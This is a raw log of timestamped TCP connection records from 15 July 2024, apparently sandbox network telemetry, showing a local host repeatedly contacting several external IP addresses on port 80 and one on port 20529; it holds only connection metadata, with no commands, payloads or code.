Jul 15, 2024 12:52:13.500947952 CEST	49747	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:13.501029968 CEST	49747	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:13.501986980 CEST	49749	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:13.505960941 CEST	80	49747	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:13.507004023 CEST	80	49749	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:13.507194042 CEST	49749	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:13.507388115 CEST	49749	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:13.512545109 CEST	80	49749	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:14.432415009 CEST	80	49748	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:14.432568073 CEST	49748	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:14.432657957 CEST	49748	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:14.433795929 CEST	49750	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:14.438116074 CEST	80	49748	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:14.438749075 CEST	80	49750	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:14.438833952 CEST	49750	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:14.439194918 CEST	49750	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:14.461783886 CEST	80	49750	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:15.145025015 CEST	80	49749	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:15.145184994 CEST	49749	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:15.145428896 CEST	49749	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:15.146657944 CEST	49751	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:15.150440931 CEST	80	49749	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:15.151894093 CEST	80	49751	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:15.152224064 CEST	49751	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:15.152638912 CEST	49751	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:15.157828093 CEST	80	49751	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:16.096290112 CEST	80	49750	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:16.096410036 CEST	49750	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:16.096508026 CEST	49750	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:16.097230911 CEST	49752	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:16.101591110 CEST	80	49750	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:16.102391958 CEST	80	49752	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:16.102459908 CEST	49752	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:16.102632046 CEST	49752	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:16.107490063 CEST	80	49752	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:16.777808905 CEST	80	49751	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:16.777955055 CEST	49751	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:16.792634964 CEST	49751	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:16.793921947 CEST	49753	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:16.797930956 CEST	80	49751	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:16.799072981 CEST	80	49753	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:16.799149990 CEST	49753	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:16.807604074 CEST	49753	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:16.812613964 CEST	80	49753	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:17.423316956 CEST	80	49753	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:17.423584938 CEST	49753	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:17.429104090 CEST	80	49753	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:17.429172993 CEST	49753	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:17.734575033 CEST	80	49752	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:17.734702110 CEST	49752	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:17.734836102 CEST	49752	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:17.735692024 CEST	49754	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:17.739675045 CEST	80	49752	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:17.740578890 CEST	80	49754	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:17.740698099 CEST	49754	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:17.741628885 CEST	49754	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:17.746506929 CEST	80	49754	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:18.350729942 CEST	80	49754	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:18.351016045 CEST	49754	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:18.356348991 CEST	80	49754	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:18.356410027 CEST	49754	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:18.602849960 CEST	49755	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:18.607928991 CEST	80	49755	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:18.608062029 CEST	49755	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:18.608309031 CEST	49755	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:18.613147020 CEST	80	49755	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:20.354840994 CEST	80	49755	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:20.354923964 CEST	49755	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:20.355000019 CEST	49755	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:20.355725050 CEST	49756	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:20.359765053 CEST	80	49755	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:20.360618114 CEST	80	49756	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:20.360696077 CEST	49756	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:20.361051083 CEST	49756	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:20.365895033 CEST	80	49756	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:22.393913031 CEST	80	49756	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:22.394006014 CEST	49756	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:22.394085884 CEST	49756	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:22.394701958 CEST	80	49756	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:22.394757986 CEST	49756	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:22.394879103 CEST	49757	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:22.399049044 CEST	80	49756	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:22.399790049 CEST	80	49757	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:22.399852991 CEST	49757	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:22.400051117 CEST	49757	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:22.404870987 CEST	80	49757	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:23.996454000 CEST	80	49757	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:23.996532917 CEST	49757	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:23.996651888 CEST	49757	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:23.997318029 CEST	49758	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:24.001578093 CEST	80	49757	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:24.002484083 CEST	80	49758	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:24.002566099 CEST	49758	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:24.002881050 CEST	49758	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:24.008208036 CEST	80	49758	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:25.643027067 CEST	80	49758	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:25.643177032 CEST	49758	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:25.643323898 CEST	49758	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:25.644181013 CEST	49759	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:25.648123980 CEST	80	49758	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:25.649068117 CEST	80	49759	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:25.649137974 CEST	49759	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:25.649348974 CEST	49759	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:25.654350042 CEST	80	49759	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:26.279187918 CEST	80	49759	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:26.279639006 CEST	49759	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:26.285465002 CEST	80	49759	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:26.285619020 CEST	49759	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:47.422568083 CEST	49760	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:47.428726912 CEST	80	49760	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:47.428864002 CEST	49760	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:47.429224968 CEST	49760	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:47.442970991 CEST	80	49760	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:48.352845907 CEST	49761	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:48.358282089 CEST	80	49761	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:48.358393908 CEST	49761	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:48.358725071 CEST	49761	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:48.365884066 CEST	80	49761	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:49.179564953 CEST	80	49760	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:49.179852962 CEST	49760	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:49.180077076 CEST	49760	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:49.181180000 CEST	49762	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:49.185072899 CEST	80	49760	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:49.186326027 CEST	80	49762	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:49.186454058 CEST	49762	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:49.186743021 CEST	49762	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:49.191962004 CEST	80	49762	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:50.102274895 CEST	80	49761	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:50.102380991 CEST	49761	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:50.102500916 CEST	49761	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:50.103456020 CEST	49763	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:50.107300997 CEST	80	49761	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:50.108318090 CEST	80	49763	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:50.108402967 CEST	49763	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:50.108691931 CEST	49763	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:50.113503933 CEST	80	49763	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:50.914387941 CEST	80	49762	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:50.914472103 CEST	49762	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:50.914562941 CEST	49762	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:50.915375948 CEST	49764	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:50.919734955 CEST	80	49762	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:50.920619965 CEST	80	49764	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:50.920691013 CEST	49764	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:50.920933962 CEST	49764	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:50.925657034 CEST	80	49764	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:51.836034060 CEST	80	49763	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:51.836132050 CEST	49763	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:51.838226080 CEST	49763	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:51.839489937 CEST	49765	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:51.843123913 CEST	80	49763	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:51.845590115 CEST	80	49765	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:51.845705032 CEST	49765	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:51.852854013 CEST	49765	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:51.857834101 CEST	80	49765	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:52.565136909 CEST	80	49764	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:52.565283060 CEST	49764	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:52.565340996 CEST	49764	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:52.566131115 CEST	49766	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:52.570117950 CEST	80	49764	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:52.571019888 CEST	80	49766	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:52.571134090 CEST	49766	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:52.571376085 CEST	49766	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:52.576155901 CEST	80	49766	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:53.485176086 CEST	80	49765	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:53.485295057 CEST	49765	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:53.485382080 CEST	49765	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:53.486109972 CEST	49767	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:53.490375042 CEST	80	49765	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:53.491041899 CEST	80	49767	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:53.491122961 CEST	49767	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:53.491560936 CEST	49767	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:53.496340990 CEST	80	49767	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:54.190387011 CEST	80	49766	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:54.190548897 CEST	49766	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:54.190644979 CEST	49766	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:54.191548109 CEST	49768	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:54.195555925 CEST	80	49766	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:54.196414948 CEST	80	49768	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:54.196513891 CEST	49768	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:54.197122097 CEST	49768	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:54.202963114 CEST	80	49768	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:55.107028008 CEST	80	49767	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:55.107279062 CEST	49767	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:55.107279062 CEST	49767	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:52:55.108508110 CEST	49769	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:55.112230062 CEST	80	49767	77.238.229.63	192.168.2.5
Jul 15, 2024 12:52:55.113595009 CEST	80	49769	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:55.113698006 CEST	49769	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:55.114023924 CEST	49769	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:55.118882895 CEST	80	49769	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:55.587429047 CEST	80	49768	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:55.597779989 CEST	49770	20529	192.168.2.5	185.231.155.234
Jul 15, 2024 12:52:55.602874994 CEST	20529	49770	185.231.155.234	192.168.2.5
Jul 15, 2024 12:52:55.602963924 CEST	49770	20529	192.168.2.5	185.231.155.234
Jul 15, 2024 12:52:55.636183977 CEST	49768	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:55.710138083 CEST	80	49769	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:55.721147060 CEST	49769	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:55.726300955 CEST	80	49769	77.238.250.123	192.168.2.5
Jul 15, 2024 12:52:55.726393938 CEST	49769	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:52:56.228835106 CEST	20529	49770	185.231.155.234	192.168.2.5
Jul 15, 2024 12:52:56.229032993 CEST	49770	20529	192.168.2.5	185.231.155.234
Jul 15, 2024 12:52:56.233906031 CEST	20529	49770	185.231.155.234	192.168.2.5
Jul 15, 2024 12:52:56.277635098 CEST	49771	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:56.282957077 CEST	80	49771	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:56.283056974 CEST	49771	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:56.283332109 CEST	49771	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:56.288387060 CEST	80	49771	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:58.025455952 CEST	80	49771	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:58.025548935 CEST	49771	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:58.027501106 CEST	49771	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:52:58.028383017 CEST	49772	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:58.034765959 CEST	80	49771	195.2.70.38	192.168.2.5
Jul 15, 2024 12:52:58.034806013 CEST	80	49772	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:58.034868956 CEST	49772	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:58.038038015 CEST	49772	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:58.043406963 CEST	80	49772	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:59.757898092 CEST	80	49772	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:59.758085012 CEST	49772	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:59.758085012 CEST	49772	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:52:59.759062052 CEST	49773	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:59.763139963 CEST	80	49772	91.142.74.28	192.168.2.5
Jul 15, 2024 12:52:59.764028072 CEST	80	49773	77.238.224.56	192.168.2.5
Jul 15, 2024 12:52:59.764118910 CEST	49773	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:59.764374018 CEST	49773	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:52:59.769190073 CEST	80	49773	77.238.224.56	192.168.2.5
Jul 15, 2024 12:53:01.388410091 CEST	80	49773	77.238.224.56	192.168.2.5
Jul 15, 2024 12:53:01.388489008 CEST	49773	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:53:01.388578892 CEST	49773	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:53:01.389729977 CEST	49774	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:53:01.393410921 CEST	80	49773	77.238.224.56	192.168.2.5
Jul 15, 2024 12:53:01.394637108 CEST	80	49774	77.238.229.63	192.168.2.5
Jul 15, 2024 12:53:01.394718885 CEST	49774	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:53:01.395051003 CEST	49774	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:53:01.399852037 CEST	80	49774	77.238.229.63	192.168.2.5
Jul 15, 2024 12:53:03.016239882 CEST	80	49774	77.238.229.63	192.168.2.5
Jul 15, 2024 12:53:03.016324043 CEST	49774	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:53:03.018424988 CEST	49774	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:53:03.023361921 CEST	80	49774	77.238.229.63	192.168.2.5
Jul 15, 2024 12:53:03.037658930 CEST	49775	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:03.042675972 CEST	80	49775	77.238.250.123	192.168.2.5
Jul 15, 2024 12:53:03.042773008 CEST	49775	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:03.051862955 CEST	49775	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:03.056787968 CEST	80	49775	77.238.250.123	192.168.2.5
Jul 15, 2024 12:53:03.645287991 CEST	80	49775	77.238.250.123	192.168.2.5
Jul 15, 2024 12:53:03.645562887 CEST	49775	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:03.652822018 CEST	80	49775	77.238.250.123	192.168.2.5
Jul 15, 2024 12:53:03.652956009 CEST	49775	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:11.241122961 CEST	49770	20529	192.168.2.5	185.231.155.234
Jul 15, 2024 12:53:11.246288061 CEST	20529	49770	185.231.155.234	192.168.2.5
Jul 15, 2024 12:53:16.218729973 CEST	20529	49770	185.231.155.234	192.168.2.5
Jul 15, 2024 12:53:16.218982935 CEST	49770	20529	192.168.2.5	185.231.155.234
Jul 15, 2024 12:53:16.224369049 CEST	20529	49770	185.231.155.234	192.168.2.5
Jul 15, 2024 12:53:25.594650030 CEST	49768	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:25.600059032 CEST	80	49768	77.238.250.123	192.168.2.5
Jul 15, 2024 12:53:25.610445023 CEST	49770	20529	192.168.2.5	185.231.155.234
Jul 15, 2024 12:53:25.615324974 CEST	20529	49770	185.231.155.234	192.168.2.5
Jul 15, 2024 12:53:25.721863031 CEST	49776	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:53:25.726972103 CEST	80	49776	195.2.70.38	192.168.2.5
Jul 15, 2024 12:53:25.727237940 CEST	49776	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:53:25.727612972 CEST	49776	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:53:25.733318090 CEST	80	49776	195.2.70.38	192.168.2.5
Jul 15, 2024 12:53:25.827997923 CEST	20529	49770	185.231.155.234	192.168.2.5
Jul 15, 2024 12:53:25.875847101 CEST	49770	20529	192.168.2.5	185.231.155.234
Jul 15, 2024 12:53:27.482306957 CEST	80	49776	195.2.70.38	192.168.2.5
Jul 15, 2024 12:53:27.482620001 CEST	49776	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:53:27.483241081 CEST	49777	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:53:27.483355045 CEST	49776	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:53:27.489137888 CEST	80	49777	91.142.74.28	192.168.2.5
Jul 15, 2024 12:53:27.489181995 CEST	80	49776	195.2.70.38	192.168.2.5
Jul 15, 2024 12:53:27.489221096 CEST	49777	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:53:27.489494085 CEST	49777	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:53:27.496373892 CEST	80	49777	91.142.74.28	192.168.2.5
Jul 15, 2024 12:53:29.247735023 CEST	80	49777	91.142.74.28	192.168.2.5
Jul 15, 2024 12:53:29.247937918 CEST	49777	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:53:29.247937918 CEST	49777	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:53:29.248652935 CEST	49778	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:53:29.252837896 CEST	80	49777	91.142.74.28	192.168.2.5
Jul 15, 2024 12:53:29.253489971 CEST	80	49778	77.238.224.56	192.168.2.5
Jul 15, 2024 12:53:29.253572941 CEST	49778	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:53:29.253784895 CEST	49778	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:53:29.258563995 CEST	80	49778	77.238.224.56	192.168.2.5
Jul 15, 2024 12:53:30.876661062 CEST	80	49778	77.238.224.56	192.168.2.5
Jul 15, 2024 12:53:30.876770973 CEST	49778	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:53:30.876943111 CEST	49778	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:53:30.877686024 CEST	49779	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:53:30.881804943 CEST	80	49778	77.238.224.56	192.168.2.5
Jul 15, 2024 12:53:30.882581949 CEST	80	49779	77.238.229.63	192.168.2.5
Jul 15, 2024 12:53:30.882663965 CEST	49779	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:53:30.883075953 CEST	49779	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:53:30.887943029 CEST	80	49779	77.238.229.63	192.168.2.5
Jul 15, 2024 12:53:32.519874096 CEST	80	49779	77.238.229.63	192.168.2.5
Jul 15, 2024 12:53:32.520102978 CEST	49779	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:53:32.520102978 CEST	49779	80	192.168.2.5	77.238.229.63
Jul 15, 2024 12:53:32.520925999 CEST	49780	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:32.525496006 CEST	80	49779	77.238.229.63	192.168.2.5
Jul 15, 2024 12:53:32.526561022 CEST	80	49780	77.238.250.123	192.168.2.5
Jul 15, 2024 12:53:32.526787996 CEST	49780	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:32.527395964 CEST	49780	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:32.532418013 CEST	80	49780	77.238.250.123	192.168.2.5
Jul 15, 2024 12:53:33.143039942 CEST	80	49780	77.238.250.123	192.168.2.5
Jul 15, 2024 12:53:33.145590067 CEST	49780	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:33.155174017 CEST	80	49780	77.238.250.123	192.168.2.5
Jul 15, 2024 12:53:33.155317068 CEST	49780	80	192.168.2.5	77.238.250.123
Jul 15, 2024 12:53:33.631617069 CEST	49781	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:53:33.639328957 CEST	80	49781	195.2.70.38	192.168.2.5
Jul 15, 2024 12:53:33.639436960 CEST	49781	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:53:33.639770985 CEST	49781	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:53:33.647803068 CEST	80	49781	195.2.70.38	192.168.2.5
Jul 15, 2024 12:53:35.391968012 CEST	80	49781	195.2.70.38	192.168.2.5
Jul 15, 2024 12:53:35.392210007 CEST	49781	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:53:35.392280102 CEST	49781	80	192.168.2.5	195.2.70.38
Jul 15, 2024 12:53:35.392993927 CEST	49782	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:53:35.397962093 CEST	80	49781	195.2.70.38	192.168.2.5
Jul 15, 2024 12:53:35.398099899 CEST	80	49782	91.142.74.28	192.168.2.5
Jul 15, 2024 12:53:35.398288965 CEST	49782	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:53:35.398521900 CEST	49782	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:53:35.405550003 CEST	80	49782	91.142.74.28	192.168.2.5
Jul 15, 2024 12:53:36.437556028 CEST	20529	49770	185.231.155.234	192.168.2.5
Jul 15, 2024 12:53:36.437863111 CEST	49770	20529	192.168.2.5	185.231.155.234
Jul 15, 2024 12:53:36.442913055 CEST	20529	49770	185.231.155.234	192.168.2.5
Jul 15, 2024 12:53:37.133322001 CEST	80	49782	91.142.74.28	192.168.2.5
Jul 15, 2024 12:53:37.133461952 CEST	49782	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:53:37.133624077 CEST	49782	80	192.168.2.5	91.142.74.28
Jul 15, 2024 12:53:37.134366989 CEST	49783	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:53:37.138605118 CEST	80	49782	91.142.74.28	192.168.2.5
Jul 15, 2024 12:53:37.139391899 CEST	80	49783	77.238.224.56	192.168.2.5
Jul 15, 2024 12:53:37.139475107 CEST	49783	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:53:37.139714003 CEST	49783	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:53:37.144587994 CEST	80	49783	77.238.224.56	192.168.2.5
Jul 15, 2024 12:53:38.744818926 CEST	80	49783	77.238.224.56	192.168.2.5
Jul 15, 2024 12:53:38.745250940 CEST	49783	80	192.168.2.5	77.238.224.56
Jul 15, 2024 12:53:38.745250940 CEST	49783	80	192.168.2.5	77.238.224.56
